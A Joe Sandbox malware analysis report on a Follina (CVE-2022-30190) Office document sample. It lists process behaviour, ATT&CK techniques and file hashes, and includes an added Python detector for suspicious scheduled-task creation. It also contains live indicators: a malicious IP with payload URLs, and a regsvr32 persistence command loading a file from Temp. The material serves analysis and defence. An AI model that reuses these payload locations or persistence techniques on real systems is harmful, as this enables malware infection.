                          Stealing of Sensitive Information

                          Source: Yara matchFile source: 38.2.regsvr32.exe.12b0184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a50184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47f0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4aa0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.12b0184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a80000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a50184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.0.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47c0184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47c0184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.49b0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47f0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4aa0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.4990000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a80000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.4810000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.0.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.4810000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580442594.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000000.351550985.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.797056780.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580400049.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.582578490.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.582736314.0000000004810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                          Remote Access Functionality

                          Source: Yara matchFile source: 38.2.regsvr32.exe.12b0184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a50184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47f0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4aa0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.12b0184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a80000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a50184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.0.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47c0184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47c0184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.49b0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47f0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4aa0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.4990000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a80000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.4810000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.0.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.4810000.3.unpack, type: UNPACKEDPE
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1
Command and Scripting Interpreter
1
LSASS Driver
111
Process Injection
11
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts3
Native API
1
DLL Side-Loading
1
LSASS Driver
1
Disable or Modify Tools
LSASS Memory1
Query Registry
Remote Desktop Protocol1
Archive Collected Data
Exfiltration Over Bluetooth11
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts1
Exploitation for Client Execution
Logon Script (Windows)1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
Security Account Manager2
Security Software Discovery
SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration1
Non-Application Layer Protocol
Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac)111
Process Injection
NTDS31
Virtualization/Sandbox Evasion
Distributed Component Object Model | Input Capture | Scheduled Transfer21
Application Layer Protocol
SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script1
Obfuscated Files or Information
LSA Secrets2
Process Discovery
SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common1
DLL Side-Loading
Cached Domain Credentials1
Application Window Discovery
VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync1
Remote System Discovery
Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem3
File and Directory Discovery
Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow16
System Information Discovery
Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Behavior Graph ID: 640918, Sample: 68101181_048154.img, Startdate: 07/06/2022, Architecture: WINDOWS, Score: 84

Signatures on the sample node: Snort IDS alert for network traffic; Yara detected Microsoft Office Exploit Follina CVE-2022-30190; Yara detected CryptOne packer; 2 other signatures

Processes started from the sample: WINWORD.EXE; regsvr32.exe; regsvr32.exe; 7 other processes

WINWORD.EXE:
• DNS/IP: 185.234.247.119, ports 49761, 49762, 49780, INTERKONEKT-ASPL, Russian Federation
• Dropped: C:\Users\user\AppData\Local\...\123[1].RES (HTML); C:\Users\user\AppData\Local\...7589548.htm (HTML); C:\Users\user\AppData\Local\...\AEF9D296.htm (HTML)
• Started: msdt.exe; MSOSYNC.EXE; MSOSYNC.EXE

regsvr32.exe (first instance):
• Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Maps a DLL or memory area into another process

7 other processes:
• Dropped: C:\Users\user\AppData\Local\...\mj2renji.dll (PE32); C:\Users\user\AppData\Local\...\ej5ypzxn.dll (PE32); C:\Users\user\AppData\Local\...\343kkfih.dll (PE32)
• Started: powershell.exe 36; conhost.exe; cvtres.exe; 2 other processes

msdt.exe:
• Dropped: C:\Windows\Temp\...\DiagPackage.dll.mui (PE32); C:\Windows\Temp\...\DiagPackage.dll (PE32+)

                          No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll | 0% | Metadefender | | Browse
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll | 0% | ReversingLabs | |
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui | 0% | Metadefender | | Browse
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui | 0% | ReversingLabs | |
Source | Detection | Scanner | Label | Link | Download
38.2.regsvr32.exe.49b0000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
38.2.regsvr32.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1232827 | | Download File
39.2.regsvr32.exe.ed0000.0.unpack | 100% | Avira | HEUR/AGEN.1232827 | | Download File
40.2.regsvr32.exe.d80000.0.unpack | 100% | Avira | HEUR/AGEN.1232827 | | Download File
24.0.explorer.exe.8b0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
40.2.regsvr32.exe.4810000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
24.2.explorer.exe.8b0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
39.2.regsvr32.exe.4aa0000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
                          No Antivirus matches
                          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.234.247.119/1240405476.dat | true | Avira URL Cloud: safe | unknown
http://185.234.247.119/123.RES | true | Avira URL Cloud: safe | unknown
                                                                                                                              unknown
                                                                                                                              https://incidents.diagnostics.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                high
                                                                                                                                https://clients.config.office.net/user/v1.0/ios87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.borland.com/namespaces/TypesU68101181_048154.imgfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                    high
                                                                                                                                    https://o365auditrealtimeingestion.manage.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                      high
                                                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/68101181_048154.imgfalse
                                                                                                                                          high
                                                                                                                                          https://api.office.net87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                            high
                                                                                                                                            https://incidents.diagnosticssdf.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                              high
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/android/policies87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                high
                                                                                                                                                https://entitlement.diagnostics.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://substrate.office.com/search/api/v2/init87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://outlook.office.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/soap/68101181_048154.imgfalse
                                                                                                                                                          high
                                                                                                                                                          https://storage.live.com/clientlogs/uploadlocation87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.borland.com/namespaces/Types7rregsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://outlook.office365.com/87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://webshell.suite.office.com87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory87E203A5-891F-43FE-BEFA-581865619F97.9.drfalse
                                                                                                                                                                    high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.234.247.119 | unknown | Russian Federation | 198004 | INTERKONEKT-ASPL | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 640918
Start date and time: 2022-06-07 19:19:33 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 47s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 68101181_048154.img
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 41
Number of new started drivers analysed: 4
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.troj.expl.evad.winIMG@27/33@0/1
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 23.7% (good quality ratio 22.5%)
• Quality average: 77.2%
• Quality standard deviation: 26.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, backgroundTaskHost.exe, fsdepends.sys, sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, rundll32.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 184.30.21.144, 52.109.88.177, 52.109.76.35
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryAttributesFile calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtQueryVolumeInformationFile calls found
• Report size getting too big, too many NtSetInformationFile calls found
Time | Type | Description
19:20:50 | API Interceptor | 39x Sleep call for process: powershell.exe modified
19:23:20 | Task Scheduler | Run new task: hxmpsgi path: regsvr32.exe s>-s "C:\Users\user\AppData\Local\Temp\t1.A"
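The Task Scheduler entry above is the persistence worth alerting on: a signed Windows binary (regsvr32.exe) registered as a scheduled task to load a file with no library extension from the user's Temp directory. The following is an added detection example, not part of the Joe Sandbox report: it parses Windows Security event 4698 (scheduled task created) records and flags tasks whose action is a known proxy binary pointed at a user-writable path, or at a payload that regsvr32/rundll32 would not normally load. The 4698 event XML samples are constructed here (not captured logs), the task names other than hxmpsgi are invented, and the argument string `-s "C:\Users\user\AppData\Local\Temp\t1.A"` assumes that `s>` in the report line is the sandbox's separator between the task's path and its arguments.

```python
"""Detect suspicious scheduled-task creation (Windows Security event 4698).

Flags tasks whose action is a signed Windows proxy binary (regsvr32.exe,
rundll32.exe, ...) loading a payload from a user-writable directory or with a
non-library extension, the pattern in the report's Task Scheduler entry.
"""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Signed Windows binaries routinely abused to execute attacker-supplied files.
PROXY_BINARIES = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Extensions regsvr32/rundll32 legitimately load; anything else (e.g. "t1.A") is odd.
LIBRARY_EXTENSIONS = {"dll", "ocx", "cpl", "ax"}
# Directories a standard user can write to; persistence pointing here is a red flag.
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Local|Roaming)|ProgramData|Users\\Public|Windows\\Temp)\\", re.IGNORECASE
)


def build_4698(task_name, command, arguments):
    """Construct a minimal 4698 event. These are constructed samples, not captured
    logs; the element names and the TaskContent nesting mirror the real event."""
    task_xml = (
        f'<Task version="1.2" xmlns="{TASK_NS}"><Actions Context="Author"><Exec>'
        f"<Command>{escape(command)}</Command><Arguments>{escape(arguments)}</Arguments>"
        "</Exec></Actions></Task>"
    )
    return (
        f'<Event xmlns="{EVT_NS}"><System><EventID>4698</EventID></System><EventData>'
        '<Data Name="SubjectUserName">user</Data>'
        f'<Data Name="TaskName">\\{escape(task_name)}</Data>'
        f'<Data Name="TaskContent">{escape(task_xml)}</Data>'  # task XML travels as escaped text
        "</EventData></Event>"
    )


def extract_actions(event_xml):
    """Return (task_name, [(command, arguments), ...]) for one 4698 event."""
    ev = ET.fromstring(event_xml)
    data = {d.get("Name"): (d.text or "") for d in ev.iter(f"{{{EVT_NS}}}Data")}
    task = ET.fromstring(data["TaskContent"])  # second parse: TaskContent is embedded XML
    actions = []
    for ex in task.iter(f"{{{TASK_NS}}}Exec"):
        cmd = (ex.findtext(f"{{{TASK_NS}}}Command") or "").strip()
        args = (ex.findtext(f"{{{TASK_NS}}}Arguments") or "").strip()
        actions.append((cmd, args))
    return data.get("TaskName", ""), actions


def payload_path(arguments):
    """Pull the file the proxy binary will load: the first quoted token, else the
    first token that is not a switch. rundll32 appends ",EntryPoint"; drop it."""
    m = re.search(r'"([^"]+)"', arguments)
    if m:
        path = m.group(1)
    else:
        tokens = [t for t in arguments.split() if not t.startswith(("-", "/"))]
        path = tokens[0] if tokens else ""
    return path.split(",", 1)[0]


def is_suspicious(command, arguments):
    """Proxy binary + payload in a user-writable directory, or (for the two DLL
    loaders) a payload whose extension is not a library extension."""
    exe = command.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in PROXY_BINARIES:
        return False
    payload = payload_path(arguments)
    if USER_WRITABLE.search(payload):
        return True
    if exe in ("regsvr32.exe", "rundll32.exe"):
        filename = payload.rsplit("\\", 1)[-1]
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        return ext not in LIBRARY_EXTENSIONS
    return False


def scan(events):
    """Return [(task_name, command, arguments), ...] for every suspicious action."""
    hits = []
    for event_xml in events:
        name, actions = extract_actions(event_xml)
        hits.extend((name, cmd, args) for cmd, args in actions if is_suspicious(cmd, args))
    return hits


# Constructed samples; the first mirrors the report's task (hxmpsgi -> regsvr32 -s <Temp>\t1.A).
SAMPLE_EVENTS = [
    build_4698("hxmpsgi", "regsvr32.exe", r'-s "C:\Users\user\AppData\Local\Temp\t1.A"'),
    build_4698("ShellMaint", "rundll32.exe", r"C:\Windows\System32\shell32.dll,Control_RunDLL"),
    build_4698("VendorUpdate", r"C:\Program Files\Vendor\update.exe", "--quiet"),
]

if __name__ == "__main__":
    for name, cmd, args in scan(SAMPLE_EVENTS):
        print(f"SUSPICIOUS task {name}: {cmd} {args}")
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled, so check that setting before relying on this source; without it, the Microsoft-Windows-TaskScheduler/Operational channel (if enabled) is the fallback. The same rule applies to the task's XML on disk under C:\Windows\System32\Tasks, which is how you would hunt retroactively on a host that had no auditing at the time.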
No context
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Microsoft Access Database
Category: dropped
Size (bytes): 528384
Entropy (8bit): 0.4760292021578993
Encrypted: false
SSDEEP: 3072:GfTF1Mime1bj7FFFQFKFFF/FZF4F4FuBpYYI:ppA
MD5: 96C240AD9AC3C4EBDB7A71D235149EDA
SHA1: 3B01F9BE57B91D566D37F7F4F053435907E9E3CC
SHA-256: 31E16D22D5477F2C58BD7E55203803CC031816F89F07D94947C5D640DBBB491E
SHA-512: B693CEDE21987A01CA8E3CC2E5817BCE9D115BF43BB93E66700FC0F41DB18D390F50E3B24F51E53D91A6118E66EF93019232FFF7EFCCAC9386E5CF49E649D5AF
Malicious: false
Reputation: unknown
Preview: ....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N)U.7...i.(...`.:{6Z...Z.C`..3..y[=.|*..|.....k..Y..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 36
Entropy (8bit): 2.730660070105504
Encrypted: false
SSDEEP: 3:5NixJlElGUR:WrEcUR
MD5: 1F830B53CA33A1207A86CE43177016FA
SHA1: BDF230E1F33AFBA5C9D5A039986C6505E8B09665
SHA-256: EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
SHA-512: 502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
Malicious: false
Reputation: unknown
Preview: C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b. (the UTF-16LE string "CentralTable.accdb", with null bytes rendered as dots)
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                    Entropy (8bit):1.4485360556164644
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:1f/FHaV:11Hu
                                                                                                                                                                    MD5:0B404CFE630E2EF7A1750179EA94B598
                                                                                                                                                                    SHA1:176520B4BA08A1F85A99797C1B3FA737181CF4D8
                                                                                                                                                                    SHA-256:05670DBE1D625D10B2EAB3385E176CF74682F7C6BC220885E17DE7547667F0D3
                                                                                                                                                                    SHA-512:90AB710CD730B24997C135D8FA91C66FEA99CD220D796CF48E9A33EA93F1E3BBF1D94BD4A77FDF0175EC84E472A1CA2E54B4AAC7D2015539D39217CCC04D55FA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:468325. Admin.
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):147863
                                                                                                                                                                    Entropy (8bit):5.3589365772806286
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:mcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:5HQ9DQW+zIXLI
                                                                                                                                                                    MD5:A9A5AE9EC5ADA3A6D5D238F6FD48D1A0
                                                                                                                                                                    SHA1:746CDEC0870A427C288F6BD8DB86BB4004631B3C
                                                                                                                                                                    SHA-256:8D3C054A45E0F7C3E39020A80883C26725E66A0263BD7FDE20DE69AF438166BD
                                                                                                                                                                    SHA-512:0A3BF3288EAB8A7990421404AD0276CF9FA90467E2BA801FA3F8E9E0BD068F8BB3A052534EC9FFB85249252EF6567BE3E585D85C4C8E16AD7F4116931177F02B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T17:21:10">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6241
                                                                                                                                                                    Entropy (8bit):4.836014560592255
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                    MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                    SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                    SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                    SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                    • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, Author: Joe Security
                                                                                                                                                                    Reputation:unknown
